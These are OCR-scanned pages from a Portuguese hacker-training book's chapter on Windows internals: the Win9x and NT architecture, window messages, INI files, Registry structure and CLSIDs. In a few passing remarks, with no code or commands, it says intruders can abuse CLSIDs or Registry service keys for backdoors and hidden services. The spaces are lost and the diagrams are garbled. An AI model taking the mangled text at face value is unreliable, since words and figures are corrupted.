dentedohardwareutilizado.UmdoscomponentesdessacamadaéoVMMou
VirtualMachineManager.ÉoVMMquecriaeadministracadaumadasmáqui-
nasvirtuaisparatodososprogramasdousuário,eopróprionúcleodosistema
temsuaprópriaVM.
"im
.
'.''''''''.'
EI ............
<,Programas
Shellde32-bits
Registro
NúcleodoWindows98("core")
Gerenciadorde
sistemasde
II
Gerenciadorde
II
Gerenciadorde
arquivos Configuração OriversWOM
instaléveis(lFS)
Agendador
deprocessos
Interdacepara
oMS-DOS
emmodo
protegido
DeviceOrivers
1691
IPlataformaWindows

IUniversidadeH4CK3R I
OutrocomponentedessacamadaéoIFSouInstallableFileSystem.Osiste-
manãoépreparadoparareconhecerumnúmero[mitodesistemasdearqui-
vosdemaneiranativa.Emvezdisso,oIFSpermitequenovosfilesystemssejam
"plugados",fornecendoassimcompatibilidadeparavirtualmentequaisquerti-
posdeles-bastaquealguémescrevaomódulocorrespondente.
rC:J
IProgramasI
AcessóriosI'
Shellde32-bits IIRegistro
NúcleodoWindows98("core")
~~/[~V~M~~I..
:..o,'," "Gêr~~Ciadorde
~~ .I I Config'!:Ir~ção
_-"_~44-ft~-" .', '...
Gerenciadorde
DriversWDM
GerenciadordeEIS(lOS)
CamadasSCSI
~
o
~
J
o
Camadasdiversas*
Oriver
deconexão
Mini-camadadeconexãoSCSI
OGerenciadordeConfigurações,
poroutrolado,éoresponsávelpela
auto-matizaçãodainstalaçãode
hardwarePlugandPlayeseusdrivers.
IOmóduloregetodooprocessode
instalação,configuraçãoedesins- [
talação,emantématualizadaabase
dedadosdehardwarenoRegistro.
Acessórios
Programas
Shellde32-bits
170I
PlataformaWindows r
NúcleodoWindows98("core")
GeJ8Ilciada(dé""
.
s";s
,
tem
,
asde ..,"I'
arquIvos ,,.,I
instaléveis(IFS)
-
.
Gerenciadorde
DriversWDM

Universidade1°ano
PorfIm,oWDM(Win32DriverModel)éumacamadadetraduçãoentreos
driversdedispositivoeonúcleo.Ele"engana"odriver,fazendo-opensarque
estáinstaladonokerneldeumWindowsNT.Comisso,fornecedoresde
hardwarepodemdesenvolverdriversquefuncionememambasasplatafor-
masindiferentemente.
Acamadadosistemaoperacionalmaispróximadohardwareéadedevice
drivers.Estessãocompostospordoistiposcomplementaresdedrivers,os
UniversaiseosMini-drivers.Vejaailustração:
Device
J
OsdriversUniversaissãograndesguarda-chuvascomespecifIcaçõesgenéri-
casparaosdispositivos.Porexemplo,háumdriverchamadoUniversalModem
quecontéminformaçõesgenéricascompartilhadaspelamaioriadosmodens.
Issofacilitasobremaneiraodesenvolvimentodedriverscomascaracterísticas
específicas.Taiscaracterísticassãoimplementadasemdriversauxiliarescha-
madosdeMini-drivers.Nonossoexemplodosmodens,umfabricantepodese
basearnodriverUniversaleescreverumMini-driverapenascomas
especifIcaçõesquediferirem.Noteaindaquemuitosdispositivosdehardware
podemtrabalharsomentecomodriveruniversal.
OtipodedrivermaiscomuméoVirtualizationDriver,ouVxD.Algunsdispo-
sitivosdehardwaredevemsercapazesdeatendersimultaneamenteasolicita-
çõesdediversosprogramas.EssesdispositivosusamVxDsparacriarváriasins-
tânciasdesimesmos.Cadamáquinavirtualdosistemapensa,então,queo
hardwareemquestãoéexclusivoparasi.
Oúltimoelementoé,emcompanhiadaInterfacecomoUsuário,omaispalpá-
vel.ORegistroéumbancodedadosqueguardaasconfIguraçõesglobaisdetodo
osistema,bemcomoasdecadaaplicativo.Qualqueralteraçãocomportamental
oudefuncionamentodosistemadeveserefetuadanoRegistro.
~FamíliaWinNT
AarquiteturadafamíliaWinNTdifereradicalmentedafamíliaWin9x.Nela,há
umaseparaçãoexplícitaentreomododeoperaçãodokerne1eomodode
operaçãodousuário.Osprogramasdousuáriorodamemumespaçodememó-
riaexclusivoepossuemumtempodeterminadodeusodecpu.Osprocessos
rodandonomodokerne1estão,dessaforma,protegidoscontraaaçãopredató-
riadeprogramas"mal-educados".
I71I
1
PlataformaWindows

IUniversidadeH4CK3R I
System
Support
processes
Service
Processes
User
applications
Enviroment
subsystems
~SubsystemOLls J
UserMode
KernelMode
Executive
~~r~elm..ml[MOevíceOriv:rs J
~H.a.rdware.Abstra'~ti.~~...f~Y.~..i::~~~.~~:.:...1
Windowing
andgraphics
Aocontráriodesistemasoperacionaismaisantigos,comooUnixoriginale
ossistemasdemainframes,okerneldoWindowsNTedescendentesnãoé
monolítico.Emvezdecarregartodosostiposdedevicedriverspossíveise
imagináveisdentroda"cachola",oWindowsempregaoconceitodemicrokerne1:
umnúcleocomapenasosserviçosmaiscríticoseessenciaisquepodeser
comp1ementadocomprogramasauxiliaresexternos.Amaioriadessesprogra-
masexternosrodaemmodouser,deixandookernelmodeapenasparaos
serviçosdemaisbaixonívelealtaprioridade.Taisserviçosestãodivididosem
cincograndescomponentes.OprimeiroéoGDI,quecontrolaosdispositivos
devídeodeformasemelhanteaodafamíliaWin9x.
Osquatrooutroscomponentes -WindowsExecutive,Kernel,DeviceDrivers
eHAL-sãotãointimamenteligadosentresiqueaparecemnummesmoquadro
emnossodiagrama.OExecutiveabrigadiversosmódulosdeinterfaceentreo
kerneleosoutroscomponentes,tantoparaousuárioeprogramasquantopara
ohardware-poderiaserconsideradoum"shell"dokernel.Osdevicedrivers
trabalhamdemaneiratambémmuitosemelhanteaosdafamíliaWin9x,com
arquiteturabaseadaemVxDseWDM.Porúltimo,oHardwareAbstractionLayer
ouHAL,forneceumacamadadeabstraçãoparaokernel.
OprincípiodefuncionamentodoHALémuitoparecidocomodomodelo
Universal!Mini-driver.OHAL"engana"onúcleodoWindows,fazendocomque
eleacreditequeohardwaresejasempreomesmo.Sealgumacoisanaarquite-
turadoPCmudar-porexemplo,umnovométododeacessoàmemória-,
bastainstalarumnovoHAL.Nãohaveránecessidadedereinstalarumaversão
maisnovadoWindows,muitomenosreescrevê-Iotodonovamente.
OssistemasdafamíliaWinNTtambémseutilizamdoconceitodeRegistro
paramanterasconfiguraçõesdosistema.Aestruturadoregistroé,inclusive,
muitoparecidacomadafamíliaWin9x.
721
PlataformaWindowsI

Universidade1°ano
1~, 1/~
..;.-:
I I
I I
I I
I I
UserMede
I
I
"
I
:KernelMede
.
. ..
Observe assemelhanças ediferenças entreestediagrama eodafamíliaWin9x.
DentrodoExecutive,temosummódulo VMM comfunçãoidênticaaodoWindows
9x.Trêsoutrosmódulos (Gerenciador deObjetos,deProcessos edeChamadas
deSistema) cuidam dogerenciamento deinstâncias deprocessos emétodos
paraokernel.Umnovomódulo éoGerenciador deReferência deSegurança,
quefornece serviçosdeautenticação esegurança paraossubsistemas externos.
Lembre-se dequeafamíliaNTéverdadeiramente multiusuária e,portanto, ne-
cessitaderotinasdeautenticação econtroledeacesso.Oúltimomódulo, chama-
dodeGerenciador deE/S(I/OManager), agregaosserviçosdeE/SdoWindows
paradispositivos dehardware, comunicação externa (serialeredes)eprincipal-
mente comosdispositivos dearmazenamento (discosefitas).
Osváriossubsistemas querodam emmodo usuário controlam acriaçãode
máquinas virtuaisparaasaplicações dosusuários.Observe queháumsubsistema
exclusivo parasegurança queapresenta osdiálogosdeautenticação paraousu-
árioecomunica-se comoGerenciador deReferência deSegurança nonúcleo
dosistemaparaprover ounegaracesso.
Queime umpouco deneurônios etentedescobrir como cadaumdosmódulos
mostrados aífunciona einterage com osoutros.Pesquise naInternet atéen-
contrarexplicações sobrecadaumdeles,semdeixardeprocurar pornenhum.
Depois disso,largueolivro,arrume-se, saiadecasaevávergente.Tomar um
chope talvez...
1731
IPlataformaWindows

IUniversidadeH4CK3RI
Entidades
oWindowséumsistemaoperacionalbaseadoemeventos.Poreventos,en-
tendemosqualqueratividadeemalgumhardware-omovimentodomouse,
porexemplo-ouossinaisprovenientesdeprogramas-quandoumajanelaé
fechada.
OWindowspossuitrêsentidadesprincipais:programas,janelasemensa-
gens.Osprogramassãoosaplicativosqueaspessoasusam:seueditorde
textospreferido,acalculadora,ojogodePaciênciaouoemuladordetermi-
nal.Cadaprogramapossuiumaoumaisjanelas.Ousuáriosecomunicacom
osprogramasatravésdosistemaoperacional,queseutilizademensagens
paratal.Cadaprogramasecomunicacomsuasváriasjanelastambématra-
vésdemensagens. .
Osprogramassãocompostosdeumoumaisarquivos.Ostiposmaiscomuns
dearquivosemprogramasparaWindowssãoosdeextensãoEXE(aspartes
docódigoespecíficasdaqueleprograma),DLL(bibliotecascompartilhadosde
funções)e,maisrecentemente,controlesActiveX(umtipoespecialdeDLL
contendoextensõesmultimídia).
AsDLLssãocomponentesimportantesnossistemasWindows.Acrônimopara
DinamicLinkLibraries,elassãobibliotecasdefunçõesquepodemseracessadas
porqualqueraplicativo.AlémdereduzirotamanhodosarquivosEXE,sãoas
DLLsquepermitemqueváriosprogramascompartilhemomesmorecursoou
amesmacaracterística.Porexemplo,todososaplicativosparaWindowspos-
suemamesmaaparênciadevidoaumaDLLemespecial,aGDI.DLL,quecuida
dainterfacegráficacomousuário.PraticamentetodookerneldoWindowsé
baseadoemarquivosDLP.Programadorespodem,ainda,utilizarfunçõesdas
MicrosoftFoundationClassesparafacilitaroseutrabalho.AsMFCsestãocon-
tidasnumaDLLchamadaMFC.DLL.
Osprogramasgeramdiversasjanelas.Alémdaapresentaçãovisual,asjanelas
sãoentidadesqueencerramemsidezenas,àsvezescentenas,decamposde
informaçãoquecontrolamcores,tamanhodajanela,tamanhodaborda,posi-
çãodosobjetosdentrodajanela,etc.UmdeleséchamadodehandJe,queiden-
tificaoprogramaquegerouajanela.Outrocampoéowindowhand1e,que
identificaajanelacomumnúmeroúnico(diferentedezero)nosistema.Um
terceirocampodeinteresseéoZ-order.Éapartirdelequeosistemadefinea
ordemdeapresentaçãodasjanelas.
Paraacomunicaçãoentreosistemaoperacional,osprogramasesuasjanelas,
sãoemitidasmensagensentreeles.Umamensagemnadamaisédoqueuma
pequenaestruturadedados.Normalmente,elainclui:
5Obviamentenãoestamosconsiderandoaspartesdokeme1herdadasdoMS-DOS.NoApêndice"oKeme1do
MS-DOS"(queestánoCD)temosumadípidaexplicaçãodecomofuncionaokeme1doMS-DOS.
1741
PlataformaWindows[

Universidade1°ano
~Timestamp(horaemquefoiemitida)damensagem
~Identificadordamensagem
~Identificadordajanela(windowhandIe)
~Doisoumaiscamposparaamensagememsi
oidentificadordamensageminformaaoprogramaoujanelao"assunto"da
mensagem.Osnomesdasmensagenssãosugestivos,comoporexemplo
WM_LBUTTONDOWN (botãoesquerdodomousefoipressionado)ou
WM_KEYDOWN (umateclafoipressionada).Entretanto,internamentecada
umdessesnomesésubstituídoporumaconstantenumérica.Osnomessão
apenasmnemônicos6.
Asmensagenssãogeradasdeformabemsimples.Vamosimaginarumasitua-
çãoreal:ousuáriopressionouatecla"A:'.Otecladoenviaaocomputadorum
tremdedadosindicandoprimeiroqueumateclafoipressionada,depoisqual
teclafoiessae,emseguida,onúmeroASCIIdocaracterecorrespondenteàtecla.
Quandoousuáriosoltaatecla,otecladoaindaenviaumsinalindicandoesse
evento.Cadapeçadehardwareemseucomputadorpossuiumsinalelétrico
chamadointerrupçãoassociadoaela.AElOSdocomputador,quandorecebe
umsinaldeinterrupção,páratudooqueestáfazendoedesviaoprocessamento
paraumdeterminadoendereçoassociadoaessainterrupção,eentregaocon-
troledaCPUaoprogramaqueláreside.Esseprogramaéchamadode
manipuladordeinterrupçõesouinterrupthandler.
OinterrupthandlernãoéumprogramadaElOSesimumarotinadosistema
operacional,portantoéóbvioqueoWmdowsinstalouláseuprópriomanipulador
paramontarmensagensbaseadasnasinterrupçõesrecebidas.Amensagemdo
exemploconteráoidentificadordemensagensWM_KEYDOWN, umnúmeroiden-
tificandoqualteclafoipressionadaeoidentificadordajanelaemqueateclafoi
pressionada.Depoisdisso,amensagemseráenviadaàjanela.Otecladogerará
aindaoutramensagemidentificadacomoWM-CHAR,contendoocódigoASCII
datecla.Quandoateclaforsolta,égeradaumamensagemWM_KEYRELEASE.
Asmensagensgeradasvãoparaumamachamadaapplicationmessagequeue.
Cadaprogramapossuisuama,eoWindowsdirecionacorretamenteasmensa-
gensparacadaum.Asaplicaçõesvãosacandocadamensagemdamaeas
redirecionandoparaasjanelascorrespondentes.Asjanelas,porsuavez,possu-
emfunçõesembutidaschamadasdewindowprocedures,quetratamosdados
recebidosnamensagemedecidemoquefazercomeles.Algumasmensagens
nãosãodirecionadasanenhumajanela.Taismensagenscaemnoprocedimento
defaultdoWindowsesãotratadaspeloprópriokernel.
6Nãoéobjetivodestelivroservirdereferênciaparaprogramadores.Entretanto,sevocêquiser
realmenteaprendercomovírusecavalosdetróiafuncionamnoWindows,énecessárioquevocêdomine
umpoucomaisdeprogramaçãodoqueobásicodeVisualBasicouDeIphi.Bonspontosdepartidasãoas
documentaçõesdaMicrosoftFoundationClasses(MFC),doWindowsSoftwareDeveIopmentKit(WSDK)
eositeoficialdaMicrosoft(www.microsoft.com).
1751
1PlataformaWindows

IUniversidadeH4CK3R I
Comoémesmoqueeufaçoaquilo?
Todosistemaoperacionalpossuiummecanismoparamantersuasconfigu-
rações.ComoWindowsnãopodiaserdiferente,mas,aocontráriodevários
outrosSOsqueutilizamarquivosdetextopuro,aMicrosoftcriouumaestrutu-
racompilada(binária)eextremamenteobscuradeguardarascoisas.Háprós
econtrasnessaabordagem.
OsarquivosINI
oveteranoWindows3possuíaumamaneiraaparentementefácildemanteras
configuraçõesdosistema.Pormeiodearquivosdetextosimplescomextensão
INI,erapossíveldefinirtodasasconfiguraçõesdoWindowsedasaplicações,
carregardriversdedispositivoemódulosparaokerneldosistemaoperacional.
Inicialmentehaviadoisarquivos,WIN.INIeSYSTEM.INI.Oprimeiroarmaze-
navaasconfiguraçõesreferentesaousuário(cores,ícones,posiçãodasjane-
las)eosegundoaspartesreferentesàmáquina,aohardwareeaofunciona-
mentointernodoWindows-driversdedispositivo,programasresidentes,ca-
minhosearquivosinternos.OarquivoSYSTEM.INIguardavatambémconfigu-
raçõesdosprogramaseaplicativosqueousuárioinstalavaemsuamáquina.
MasavidaeraduraantesdoWindows95.OsarquivosINIpodiamterum
tamanhomáximodeapenas64KB.Mesmosendoumarquivodetextopuroessa
limitaçãopermitiaguardarumaquantidadedeinformaçõesmuitopequena.A
soluçãofoicolocar,noSYSTEM.INI,apontadoresparaolocaldeoutrosarquivos
INI,ecadaaplicaçãopoderiateroseu.Osprogramasaindatinhampermissão
demantersuasconfiguraçõesnoSYSTEM.INI,masosdesenvolvedoreseram
encorajadosacriarseusprópriosINIs.Porexemplo,noSYSTEM.INIhaviauma
indicaçãoparaoMicrosoftExcel(C/OFFICEIEXCEL.INI),eneleoExcelguar-
dariasuasconfigurações.Simples,não?Nemtanto.
Noinício,osusuáriosinstalavampoucosprogramas.GerenciarpoucosINIs
eratarefafácilparaoWindowseparaousuário.Mas,àmedidaquenovospro-
gramascomeçaramaaparecer-algunssérioseumaimensamaioriadeinutili-
dadesrepletasdebarulhinhos-,jánãoerapossíveldesempenhartalfunçãocom
agalhardiadeoutrora.ComodeterminarqualdosarquivosINI(osdesistemae
osdasaplicações)teráprecedência,casoalgumparâmetroestejaconflitante?
Olimitede64KBtambémcomeçouaficarpequenoparaaquantidadededeta-
lhesquecadaaplicaçãotinhadearmazenar,emesmooSYSTEM.INIestavarepleto
devetoresapontandoparaosoutrosINIs.Outrosfatorescontribuíamparaoau-
mentodotamanhodosINIs:aplicativosqueeramdesinstaladosnormalmentenão
removiamsuaslinhasdoSYSTEM.INI,emesmoumsimplesupgradedeprograma
(porexemplo,doWordPerfect2parao3),namaioriadasvezes,terminavaem
configuraçõesduplicadasnoarquivo.Noboot,oWmdowseraobrigadoalero
conteúdodepaquidérmicosWIN.INIeSYSTEM.INI,que,mesmomenoresdoque
64KB,contribuíamparaaquedadedesempenhodosistema.
761
PlataformaWindows[

Universidade1°ano
Registraroquê?
ApartirdoWindowsNT,enotadamentenoWindows95,aMicrosoftintrodu-
ziuumanovamaneiradelidarcomessasinformaçõesquefosse,aomesmo
tempo,centralizadaeflexível.BatizadadeRegistrodoWindows(ou,eminglês,
WindowsRegistry),onovosistemadearmazenamentoaliviaoSOdeterde
lidarcomumainfmidadedearquivosINIespalhadospordiversosdiretórios.
Masoqueé,exatamente,essenegóciodeRegistro?Podemosdefmi-Iocomo
umbancodedadosemquesãoarquivadastodasasconfiguraçõesdosistema.
SemprequeumusuáriofazalgumamudançanoPaineldeControle,alteraalgu-
maassociaçãodearquivoouinstalaumprograma,taismudançassãoguarda-
dasnele.OsistemaaindausaoRegistropararastrearossoftwaresinstalados,
seusarquivosecomocadaprogramaserelacionacomosoutros.
Emtermospuramentelógicos,oregistroéumaentidadeúnica,emboraeste-
jafisicamentecontidoemumconjuntodearquivosseparadosporafinidadede
configuração.Cadaumdelespossuiumtamanholimitede40MB-maisdoque
suficienteparaqualqueraplicação.
NafanúliaWm9xtemososarquivosSYSTEM.DAT,quetratadasconfigurações
dehardwareesoftware,eUSERDAT,quetratadasconfiguraçõespessoaisdecada
usuário.OWmdowsMeaindapossuiumterceiroarquivochamadoCLASSES.DAT,
quearmazenaalgumasinformaçõessobreprogramaseassociaçõesdearquivos.
OsarquivosSYSTEM.DATeCLASSES.DAT,sendoúnicos,estãosemprenodiretório
C\WINDOWS.Sempre háumUSERDATnessemesmodiretório,também.Noen-
tanto,seoseusistemaestiverconfiguradoparapermitirperfis,cadausuárioterá
seupróprioUSERDATnodiretórioC\WINDOWS\Proilles\<nomedousuário>\,
ficandooarquivododiretóriodoWmdowsapenascomodefault.Quandoousuá-
riofazloginnosistema,suaáreadetrabalhopersonalizadaserálidaecarregada.
Casoautilizaçãodeperfisdeusuárioestejadesabilitada,todososusuárioscom-
partilharãoasmesmaspreferênciasgravadasemC\WINDOWS\USERDAT.
AfanúliaWinNT(incluindoaíoWindows2000)mantémtodososarquivos
doregistroem%SystemRoot%\System32\Config.AocontráriodoWindows9x,
seisarquivosabrigamoregistrodafamíliaNT:DEFAULT.DAT,SAM.DAT,
SECURlTY.DAT,SOFTWARE.DAT,SYSTEM.DATeNTUSERDAT.Osarquivosque
contêmoregistrosãochamadosdeHives7.
Apesardasdiferençasfisicas,logicamenteosregistrosdasduasfanúliassãomuito
parecidos.Ambosresidememarquivosbinários,sãobaseadosemelementossim-
ples,compostosporumadupla"nome=dado",sãoorganizadosemcincooumais
grandesseções,chamadasdeRootKeys(ouHKEYs)enãopodemsereditados
diretamente:énecessáriousarprogramasespeciaisparatal.Existemdiversasfer-
ramentasquepodemserutilizadasparavisualizareeditaroregistro.Amaissim-
pleséoEditordeRegistros(REGEDIT.EXE),incluídonopróprioWmdows.Usare-
mosoRegEditpara"escarafunchar"umpoucoemnossosistema.
7Umacuriosidade:osHivesdoWmdowsXPnãopossuemaextensão.dat
1771
]PlataformaWindows

IUniversidadeH4CK3R I
AestruturadoRegistro
Paraorganizarmelhorosdadosnoregistro,adotou-seumaestruturahierár-
quica.Porissomesmoessaestruturaassemelha-seàorganizaçãoemdiretórios
esubdiretórios-ou,usandoaterminologiaMicrosoft,"pastasesubpastas".O
RegEdittirapartidodissoeapresentaessaestruturadeformamuitosimilarà
queoWindowsExplorermostraoconteúdodeseudiscorígido.
.,u.]..[".,..".
[valornãodefinido)
EI'~Meucomputador
IÍJI1JiiI
HKEY_CLASSES_ROOT
$1:iIHKEY_CURRENT_USER
ffi.GfjjJHKEY_LOCAL_MACHINE
B~ HKEY_USERS
,IJJ~.DEFAULT
EI~Software
B'~Micro$oft
. I!H~"
I~H~HKEY_CURRENT_CONFIG
ffJ1ill2IHKEY_DYN_DATA
Observequeosdadosestãoorganizadosemseisgrandesgruposcujosno-
mesiniciam-secomasiglaHKEYCadaumdessesgruposéchamadodeseção
ouRootKeyepodecontervaloreschamadosdechaves.Porexemplo,noRoot
KeyHKEY_USERSdoexemploacima,háumachavechamada.DEFAULTeou-
trachamadaSoftware.Chavespodempossuirduplasnome/dadochamadasde
valorououtraschaves.AchaveSoftwarepossuiumasubchavechamada
Microsoft,queporsuavezpossuioutrasubchavechamadaWindows,quepor
suavezpossuiumvalorpadrão.Sãoasduplasnome/dadoquerealmentearma-
zenamasinformaçõesnoregistro.Hátrêstiposdevalores:String(umvalor
emtextopuro),Binary(umvalorbinário-normal-
mentedadosreferentesahardwareechavesdeati-
vaçãocriptografadasdesoftware)eDWORD(nor-
malmenteumvalorbooleano-1paraativado,O
paradesativado).Autilizaçãodecadaumdelesde-
penderádocontexto.
HácincoseçõesemalgumasversõesdoWindowseseisnasdemais.Cada
seçãotemumaespecializaçãoecontémasinformaçõesreferentesaela.
~HKEY_CLASSES_ROOT -Estaseçãocontémtodasasassociaçõesde
arquivodoWindows.ÉpormeiodelaqueoWindowssuportadraganddrope
OLEepermiteadefiniçãodeatalhosnosistema.AlgunsaspectosdaGUI
N.omei."
§J(Padrão)
§JAUachToDe,klop
8!1Bit,PerPixel
8!1De$ktopPo$
8!1DPILogica~
~"C"M:M'"
;.!ILba&$v<.<"w
(valornãodefinido)
"1"
"16"
"240.180"
"96"
178I
PlataformaWindowsr

Universidade1°ano
(interfacegráficacomousuário)tambémsãodefinidosnela.Pararemover
umaassociação,bastaexcluirachavecomaextensãodoarquivo.EsteRoot
Keyéfalso:naverdade,éumasubchavedeHKEY_LOCAL_MACHINE.
~HKEY_CURRENT_USER -Contémasinformaçõesdousuárioqueestáatu-
almenteusandoosistema.TambéméumRootKeyfalso:naverdadeéumatalho
paraumasubchavenaseçãoHKEY_USERS.Quandoousuáriodálogout,todasas
configuraçõesdedesktop,menuIniciar,loginesenhasdeHKEY_CURRENT_USER
sãosalvasnachaveexclusivadousuárioemHKEY_USERS.
~HKEY_LOCAL_MACHINE -Asinformaçõesusáveisportodososusuá-
riosindiscriminadamenteestãonestaseção,incluindohardwareeseusdrivers,
softwareinstaladoesuaconfiguraçãoepreferênciasglobaisemgeral.
~HKEY_USERS-Aquivãoaspreferênciasindividuaisdecadausuário,que
érepresentadoporumasubchaveCLSID.Quandoousuáriose"Ioga"nosistema,
suaspreferênciaseconfiguraçõessãocopiadasdaquipara
HKEY_CURRENT_USER.Quandoousuáriodá"logout"-eapareceaquelediálo-
godizendo"Salvandosuasconfigurações"ou"Savingyoursettings"-,osistema
estánarealidadecopiandooconteúdodeHKEY_CURRENT_USER devoltana
chaveprivadadousuárioemHKEY_USERS.Umamaneirafácildevoltarascon-
figuraçõesdousuárioaopadrãodosistemaéapagarsuachavenesteRootKey.
~HKEY_CURRENT_CONFIG -SemelhanteaHKEY_CURRENT_USER.An-
tesdeseremsalvas,asalteraçõesnoregistroreferentesàinstalaçãodehardware
esoftwareestãoguardadasnesteRootKey,quenaverdadeéapenasumatalho
paraumasubchaveemHKEY_LOCAL_MACHINE.
~HKEY_DYN_DATA-MaisumRootKeyfalso:apontaparaoutrasubchave
deHKEY_LOCAL_MACHINE.DispositivosPlugandPlayusamestaseçãopara
armazenarsuasconfiguraçõesduranteainstalação.Comoopróprionomediz,
esseRootKeyédinâmicoeseráalteradosemprequedispositivosdehardware
foreminstaladosouremovidosdosistema.SistemasdafamíliaWinNT(incluin-
doWindows2000eWindowsXP)nãopossuemesteRootKey,emboraachave
dentrodeHKEY_LOCAL_MACHINEaindaexista.
Todasaschavesesubchavespossuemumvalorpadrãoepodempossuirum
oumaisvaloresmodificáveis.Oquechamamosdevalorénarealidadeuma
duplaformadaporumnomequeoidentificaeumdadoaeleassociado.
Umduplocliqueemqualquerumdosvalorespermiteeditá-Ios.Nãoénecessário
"salvar"asalterações:opróprioRegEditseencarregadefazê-Ioautomaticamente
aoserfechado.
CLSIO?
Algumaschavesevalorespossuemumcódigocompletamenteilegívelchama-
doCLSID.AcrônimoparaClassIdentifier,osCLSIDssãoumaseqüênciadeletras
8Classessãoentidades"c1onáveis"queencerramdentrodesivaloresvariáveiseconstanteserotinas
chamadasdemétodos.Paramaisinformações,consulteosapêndicessobreprogramaçãodisponiveisnoCD.
1791
IPlataformaWindows

IUniversidadeH4CK3R I
enúmeros,únicosnosistema,queidentificamcadaumdoscomponentesCOM
existentes.UmexemplodeCLSIDé{172BDDF8-CEEA-llDl-8B05-
00600806D9B6}.Complicado,não?
ComponentObjectModelsouCOMssãomeiosdecontrolaroWmdowsatravésde
scriptssimples.Osistemausaomodelocliente/servidor:háprogramasqueoferecem
serviçosCOMparaqueaplicações-clientepossamusar.Asaplicações-clientesãoos
scriptscriadospelousuário.OsservidoresCOMdisponibilizamosmétodos(rotinas
quefazemaJgumacoisa)evariáveispormeiodec1asseS8.Cadaumadasclassesexisten-
tesnoWmdowspossuiumidentificadorúnicochamadoClassIdentifierouCLSID.
UmservidorCOMmuitoconhecidodosprogramadoreséoMicrosoftWord.É
possívelusarumobjetodoWordemoutrasaplicaçõespormeiodoCLSIDdesse
objeto.OutrosservidoresCOMmuitousadossãooInternetExplorer(abasedo
Windows)eoOutlookExpress.
ÉpossívelcontrolardiversosaspectosdoWmdowssimplesmenteassociando
CLSIDsachavesnoRegistro.Assimcomoosprogramadoresofazemparafacili-
tarsuavida,oshackersusamosCLSIDsnãodocumentadosparacriarmeiosde
"tomar"suamáquinaemumainvasão.PormeiodosCLSIDsépossívelusaros
própriosmecanismosdoWindowsparaestabelecerumacomunicaçãoentreo
computadorinvadidoeoinvasor,semanecessidadedeumcavalodetróia
muitoelaborado.
Comessesfundamentosjáépossíveldissecarasentranhasdesseentemiste-
rioso.OsautoresacreditamqueseriapossívelimplementarCLSIDscomno-
mesmaislegíveis,masaMicrosoftnãosóelaborouopadrãodessaformaobs-
curantistacomonãodivulgoumuitasinformaçõesarespeito.Apesardisso,al-
gumasinformaçõessobreCLSIDs,COMeoRegistropodemserencontradas
noTechNet(www.microsoft.com/technet).Fogeaoescopodestelivroanali-
sarcomprofundidadetodososaspectosdoRegistroeseusCLSIDs,embora
sejaobrigaçãodetodocandidatoahackeriratrásdessesconceitos.
Umpoucodegraxa noscotovelos...
DetodooRegistrodoWindows,aseçãomaisinteressanteé,realmente,a
HKEY_LOCAL_MACHINE.UsandooRegEdit,navegueatéessaRootKeyeobser-
veatentamentesuaschaves.AsdescriçõesabaixoservemparaafamíliaWinNT-
foramretiradasdeumWindowsXPProfessional.AFamíliaWin9xpossuialgu-
masdiferenças,emborasejamuitosemelhantenamaioriadoselementos.
AchaveSystemcontémtrêschavesControlSet(noWm9x,apenasuma),mais
aschavesLastKnownGoodRecovery(queapontaparaomelhorControlSetem
casodepane),MountedDevices(quelistatodososdispositivosdediscoede
redeemuso),Select(comconfiguraçõespadrão)eSetup(cominformaçõesso-
breainstalaçãodoWindows).AschavesControlSetOOleControlSetOO2exis-
temapenasnafamíliaWmNTesãobackupsdeconfiguraçõesanteriores.Uma
delasseráutilizadase,duranteoboot,forescolhidaaopção"Reverttolastknown
180I
PlataformaWindows[

Universidade1°ano
goodconfiguration"ou"Usarúltimaconfiguraçãofuncional".Achave
CurrentControlSetexisteemtodasasfamíliasWindowseéaqueefetivamente
abrigaaconfiguraçãoatualdeseucomputador.Édivididaemquatroseções:
~AControlcontémasconfiguraçõesdoPaineldeControle.Narealidade,o
PaineldeControleémeramenteumfrontendparaessachave.
~AchaveEnumcontéminformaçõesarespeitodetodasasinterfacesdeI/O
docomputador,comoUSB,IDEePCI.Normalmentenãosedeve"bulir"comessa
chave,mashackersexperientespodemusá-Iaparaauxiliarnocontroledocom-
putadorinvadido,forçarumavulnerabilidadeouplantaralgumabomba-relógio.
~AHardwareProf1lesguardaasconfiguraçõesdehardwaredamáquina.O
Windowspermitequeváriasconfiguraçõesdehardwarediferentespossam
serusadasnamesmainstalação,eelassãoguardadasaqui.Paraexcluiruma
configuraçãodehardware,bastaexcluirasubchavecorrespondente.OperfIl
dehardwaresendousadoestácontidoemCurrent.Hackersmal-intencionados
podemalterarouexcluirassubchavesedeixaramáquinadesconfigurada.
~PorfIm,aServicescontémdadossobretodososserviçosqueestãosendo
executados.Énessaseçãoqueosdriversdedispositivo,asbibliotecasdevíncu-
lodinâmico(DLL)eosmódulosdevirtualizaçãodokernel(VxD)sãocarrega-
dos.VxDssão,narealidade,referênciasagruposdearquivoscomextensão
SYS.NachaveServicestambémsãoarmazenadososparâmetrosquedevem
serpassadosaosVxDseàsDLLsquandosãochamadas.Naprática,todosos
serviçosqueoWindowsconhece(estejamrodandoounão)estãoarmazena-
dosemsubchavesdentrodeServices,incluindoserviçosdecomunicaçãoe
redes.IssosignifIcaqueapagarumachavedessassignifIcaesconderdoWindows
aexistênciadetalserviçoouprogramamesmoqueaindaestejafIsicamente
instaladonoHD!Oadministradordesistemaspodesimplesmenteexcluirdaqui
umaconfiguraçãoderedesqueestejadandoproblemas.Eohacker,porsuavez,
podeimplementarseusbackdoorscomoserviçosnessachave.
AindaemHKEY_LOCAL_MACHINE,achaveHARDWAREcontématalhospara
outraspartesdoregistroquepossuaminformaçõessobreohardwareinstalado.
ÉcompostopelaschavesACPI(dadosdofabricantedamáquina),DESCRIPTION
(dadossobreprocessadorememória),DEVlCEMAPS(configuraçãodedispositi-
vosdeE/S)eRESOURCEMAPS(configuraçãodosrecursosdoWindows).
DetodasaschavesdeHKEY_LOCAL_MACHINE,talvezamaisimportantepara
nossoestudosejaaseçãoSOFfWARE.Observeaorganizaçãoporfornecedor.A
chavedecadafornecedor-porexemplo,Adobe,StarDivision,Microsoft-encer-
raasinformaçõesglobaisparatodososaplicativosdeummesmofabricante,
incluindorastreamentodeversões,instruçõesparaatualizaçãoedesinstalação,
pastasdeinstalação,detrabalhoedeorigem.Algumasvariáveisdesistematam-
bémsãomantidasaí,como,porexemplo,achaveClasses,quecontémasassoci-
açõesdearquivo.ORootKeyHKEY_CLASSES_ROOTé,naverdade,apenasum
atalhoparaHKEY_LOCAL_MACHINE\SOFTWARE\Classes.
I81I
]PlataformaWindows

